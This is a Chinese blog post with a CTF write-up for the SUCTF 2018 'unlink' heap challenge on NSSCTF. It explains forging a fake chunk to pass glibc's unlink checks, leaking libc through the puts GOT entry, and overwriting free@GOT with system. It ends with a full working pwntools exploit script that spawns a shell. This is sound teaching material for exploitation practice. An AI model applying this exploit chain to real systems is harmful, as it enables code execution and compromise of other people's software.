NSSCTF[堆][Unlink]

最新推荐文章于 2024-10-13 11:08:06 发布
最新推荐文章于 2024-10-13 11:08:06 发布
阅读量1k 收藏 28
点赞数 39
分类专栏: pwn 文章标签: pwn 笔记 ctfer 堆入门 unlink
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/140406983
版权

题目:unlink任意分配chunk

题目地址:[SUCTF 2018 招新赛]unlink | NSSCTF

思路:

  1. 利用unlink前提,必须要有一个位置存储了chunkP的地址(本题时heaplist中存储了),才能基于此构造来绕过检测。
  2. 构造unlink,实现heaplist指针修改,再编辑实现任意地址读写。

分析:

  1. touch函数,size足够大,chunk不能超过11个:

    image-20240713143617347

  2. delete函数,heap指针清0,没有UAF漏洞:

    image-20240713143708871

  3. show函数,结合delete函数,所以不存在UAF漏洞:

    image-20240713143737663

  4. edit函数,存在堆溢出:

利用:

  1. buf的位置存着heap指针,可以基于此构造unlink:

    image-20240713205229172

    检查:

    image-20240713205258769

    确定:

    • fd=fakeDF_addr=buf-0x18(绕过第一个检查),
    • bk=fakeBK_addr=buf-0x10(绕过第二个检查)。
    • 最后FakeBK->fd 即 *(fakeBK_addr+0x10)=fakeDF_addr=buf-0x18(因为写入的地址是同一处,所以第一次写入fakeBK地址会被覆盖)。:
    buf = 0x6020C0
add(0x20)   #0 用来构造unlink
add(0x80)   #1 用来触发unlink 
add(0x10)   #2 切割开top chunk ,防止合并

prev_size = p64(0)
size = p64(0x20)

fd = buf-0x18   #fakeDF_addr
bk = buf-0x10   #fakeBK_addr
content = p64(fd)+p64(bk)
of_prve_size = p64(0x20)	#构造的chunkP的大小,prev_size在前一个chunk空闲时存放其大小(包括头)
of_chunk_size = p64(0x90)	#在释放free(1)时向下合并,触发对chunkP的unlink,

payload0 = prev_size + size + content + of_prve_size + of_chunk_size
edit(0,payload0)

    绕过检测:

    在这里插入图片描述

  2. free(1)触发unlink,向buf[0]写入fd值:

    free(1)

    在这里插入图片描述

  3. 继续控制buf[1]:

    #用buf[0]地址,覆盖heaplist0,进而能往buf[0]上写入数据,此后即可任意地址读写数据(buf[1]作为跳板写入任意地址)自此buf[1]变成傀儡
payload0 = p64(0)*3 + p64(0x6020c8)
edit(0,payload0)

    在这里插入图片描述

  4. 覆盖buf[1]指向puts函数的got表,进而泄漏puts函数的地址和libc基地址

    #往0x6020c8即buf[1]写puts函数的got表地址
payload0 = p64(elf.got["puts"])
edit(0,payload0)

show(1)
p.recv()
puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("puts_addr==>"+hex(puts_addr))

libc_base = puts_addr-libc.symbols["puts"]
success("libc_addr==>"+hex(libc_base))

system_addr = libc_base+libc.sym["system"]
success("system_addr==>"+hex(system_addr))

    在这里插入图片描述

  5. 继续控制buf[1],往free函数的got表写入system函数地址:

    #先传地址
payload0 = p64(elf.got["free"])
edit(0,payload0)
#再覆盖free函数的got表
payload1 = p64(system_addr)
edit(1,payload1)

    在这里插入图片描述

  6. 最后构造一个system(“/bin/sh”) 就能拿到shell:

    edit(2,b"/bin/sh\x00")
free(2)

  7. 完整EXP:

    from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

def debug():
    print(proc.pidof(p))
    pause()

# p = remote("node4.anna.nssctf.cn",28460)
p = process("./pwn")
libc = ELF('./libc-2.23.so')
elf = ELF("./pwn")


def add(size):
    p.sendlineafter(b':','1')
    p.sendlineafter(b':',str(size))
    # p.sendlineafter(b':',content)

def edit(index, content):
    p.sendlineafter(b':','4')
    p.sendlineafter(b':',str(index).encode())
    # p.sendlineafter(':',str(len(content)))
    p.sendafter(b'content',content)

def show(index):
    p.sendlineafter(b':',b'3')
    p.sendlineafter(b'show',str(index).encode())

def free(index):
    p.sendlineafter(b':','2')
    p.sendlineafter(b'delete',str(index).encode())

buf = 0x6020C0
add(0x20)   #0 用来构造unlink
add(0x80)   #1 用来触发unlink 
add(0x10)   #2 切割开top chunk ,防止合并

prev_size = p64(0)
size = p64(0x20)

fd = buf-0x18   #下一个chunk的地址
bk = buf-0x10   #上一个chunk的地址
content = p64(fd)+p64(bk)
of_prve_size = p64(0x20)
of_chunk_size = p64(0x90)

payload0 = prev_size + size + content + of_prve_size + of_chunk_size
edit(0,payload0)

free(1)

#覆盖heaplist0
payload0 = p64(0)*3 + p64(0x6020c8)
edit(0,payload0)

#利用覆盖heaplist0,往0x6020c8写puts函数的got表地址
payload0 = p64(elf.got["puts"])
edit(0,payload0)

show(1)
p.recv()
puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("puts_addr==>"+hex(puts_addr))

libc_base = puts_addr-libc.symbols["puts"]
success("libc_addr==>"+hex(libc_base))

system_addr = libc_base+libc.sym["system"]
success("system_addr==>"+hex(system_addr))

payload0 = p64(elf.got["free"])
edit(0,payload0)

payload1 = p64(system_addr)
edit(1,payload1)

edit(2,b"/bin/sh\x00")
free(2)

p.sendline(b"cat flag")
p.interactive()

    成功拿到flag

    在这里插入图片描述

波克比QWQ
关注
专栏目录
Unlink小记
2301_79696060的博客
10-02 802
Unlink小记
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1203
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
Tcache Stashing Unlink Attack
seaaseesa的博客
05-01 2006
Tcache Stashing Unlink Attack Tcache Stashing Unlink Attack就是calloc的分配不从tcache bin里取chunk,calloc会遍历fastbin、small bin、large bin,如果在tcache bin里,对应的size的bin不为空,则会将这些bin的chunk采用头插法插入到tcache bin里。首先,我们来看一...
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1530
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
tcache attack
yjh_fnu_ltn的博客
07-25 1055
在 tcache 中新增了两个结构体,分别是和其中有两个重要的函数,和这两个函数会在函数和的开头被调用,其中tcache_put当所请求的分配大小0x4087。7再复习一遍在tcache_get中,仅仅检查了,此外,我们可以将 tcache 当作一个类似于 fastbin 的单独链表,只是它的 check,并没有 fastbin 那么复杂,仅仅检查。
pwn】[SUCTF 2018 招新赛]unlink --利用之unlink
question55的博客
01-18 1534
先来看一下程序的保护情况栈不可执行,而且还开了canary看一下ida又是经典菜单题,接着分析每一个函数功能就行touch函数:有一个数组存malloc出来的地址delete函数:删除中的数据,不存在uaf漏洞show函数:打印中数据take_note函数:向中写数据分析到这里,根据题目的提示,那就用unlink来打,这里有篇博客可以先学习一下:【pwn学习】溢出(三)- Unlink和UAF_溢出 got表-CSDN博客首先我们先创建三个块debug看一下再看看一下存地址的数组接着我们来构
realloc源码赏析
yjh_fnu_ltn的博客
09-23 725
这题值涉及到了__libc_realloc函数的使用,什么情况等同于 libc_malloc、libc_free,还没有利用到里面的unlink进行块的重叠,里面的块重叠和free函数里面的有一定的区别,触发的条件也有区别。原先的chunk被放入0xf0中,之后就能正常申请到包含free_hook的chunk(这里即使count为0也是能申请到的,因为libc-2.27不是根据count来判断tcache中是否还存在剩余的chunk,而是根据。的时就能改写其下一个chunk的fd 和 bk字段。
伪造unsortedbin释放时 top chunk的衔接问题
yjh_fnu_ltn的博客
07-31 462
释放一个unsorted bin:首先判断是否与top chunk相邻,相邻则直接回归top chunk然后,判断与其相邻的chunk是否被释放:低地址处的chunk,直接用当前待释放的chunk的prev_inuse判断。高地址处的chunk,用下下个chunk(高地址)的prev_inuse位来判断。判断如果相邻的chunk也被释放的话,就会和待释放的chunk合并(要对前面判断的已释放的chunk进行完整性检查)如果相邻的chunk都未释放。
BUUCTF-pwn(11)
njh18790816639的博客
01-09 2757
mrctf2020_easy_equation 简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞! axb_2019_fmt64 经典循环格式化字符串64位漏洞! 唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击! from elftools.construct.macros import Padding from pwn import * from LibcSearcher import * context(log_level='debu
漏洞之unlink1
08-04
《深入理解漏洞:以unlink1为例》 漏洞是一种常见的软件安全问题,尤其是在C语言编程中,由于程序员对内存管理不当,可能导致严重的安全风险。本文将深入探讨一种名为"unlink1"的漏洞利用技巧,以及其在特定...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
给项目添加依赖:报错operation not permitted, unlink.原来是4048
01-20
syscall unlink npm ERR! path D:\Users\Megan\企业微信下载地址\WXWork\1688850487518406\Cache\File\2020-02\cmall-back1\node_modules\.staging\echarts-2100c70a\dist\echarts.js npm ERR! errno -4048 npm ERR...
溢出----Unlink
qq_42192672的博客
10-24 832
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink/                   http://www.anquan.us/static/drops/tips-16610.html 原理直接拷贝CTFWIKI的原话 这个直接看图挺容易懂得,有点像数据结构的链表操作 这个就是unlink的基本操...
【JasperReports笔记06】JasperReports报表开发之Jasper Studio开发工具中添加自定义字体
✅ Java 开发工程师,从事 Web 应用程序的研发,擅长 Spring、SpringBoot 等技术。 ✅ 热爱编程,业余时间学习新知识,通过 CSDN 记录学习心得和笔记内容。
10-11 121
在使用Jasper Studio工具制作报表模板的时候,我们一定会使用到字体文件,常见的字体有:微软雅黑和宋体,但是如果你想添加其他的字体,那么必须要下载字体,然后将其添加到Jasper Studio工具里面,这样才可以在开发开发工具里面使用对应的字体。我们可以在一些字体网站找自己喜欢的字体,然后下载到本地电脑里面,后续就可以开始配置字体路径啦。字体下载_免费字体下载_商用字体设计定制--字魂网字体天下-提供各类字体的免费下载和在线预览服务免费字体下载_免费商用字体_免费字体网_自由字体官网。
PostgreSQL学习笔记十:锁机制详解
软件行业技术文化交流。
10-11 1270
它通过不同级别的锁来控制对数据对象的并发访问,主要包括表级锁、行级锁、页级锁、咨询锁(Advisory Locks)以及死锁(Deadlocks)。咨询锁可以用于实现更细粒度的锁控制,例如,在不同的事务之间同步对特定资源的访问。咨询锁可以是会话级别的或事务级别的,允许用户在不同的进程或事务之间进行协调。:设计事务时,应尽量减少锁的持有时间,并避免长时间运行的事务,因为这会增加死锁的风险。这些锁可以是行级的、事务级的,或者是咨询锁(advisory locks),它们用于控制对表或行的并发访问。
[C++ 核心编程]笔记 5 函数提高
Alex的博客
10-11 434
作用:函数名可以相同,提高复用性同一个作用域下函数名称相同函数参数类型不同 或者 个数不同 或者 顺序不同注意: 函数的返回值不可以作为函数重载的条件//原函数cout
JAVA Web(学习笔记)
m0_74728220的博客
10-09 1229
客户端在发送一个请求时,一般而言都会携带一些数据(例如URL中的参数、页面中的表单、Ajax提交的参数等),当一个Servlet接收到这些请求时,Java Servlet中的类通过所提供的方法就能得到这些参数,也正是这个原因,Servlet可以对发送请求起到拦截作用,它在某些请求前先做一个预处理分析,从而判断客户端是否可以做某些请求,当Servlet具有如上功能时,一般称之为拦截器。Servlet起到这个中间角色的功能,协调各组件、各部分完成相应的功能,根据不同的请求做出相应的响应并显示结果。
前端学习笔记 --css 黑马程序员3
m0_73805171的博客
10-11 538
文章目录盒子模型盒子的边框边框的复合写法表格的细线边框边框的注意事项paddingpadding的复合属性padding的注意事项marginmargin 让块元素、行内元素、行内块元素实现水平居中margin 外边距合并相邻块元素垂直外边距合并嵌套块元素垂直外边距合并圆角边框圆角边框的使用盒子边框文字阴影浮动浮动的原理与语法浮动的特性--脱标浮动特性--浮动元素一行显示浮动特征--浮动元素具有行内块元素的特性浮动的使用注意事项清除浮动清除浮动的方法清除浮动总结定位相对定位绝对定位固定定位粘性定位定位分类总
苍穹外卖学习笔记(二十一)
最新发布
₍˄·͈༝·͈˄*₎◞ ̑̑的博客
10-13 321
取消订单与再来一单
漏洞利用:理解unlink机制与技巧
"漏洞之unlink1 - 一篇关于Linux环境下glibc库中管理漏洞的分析和利用技术的文章,作者SP00F强调了unlink操作在内存管理中的关键作用,以及如何通过覆盖相邻chunk的prev_inuse位来触发漏洞利用。文章适合于学习...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值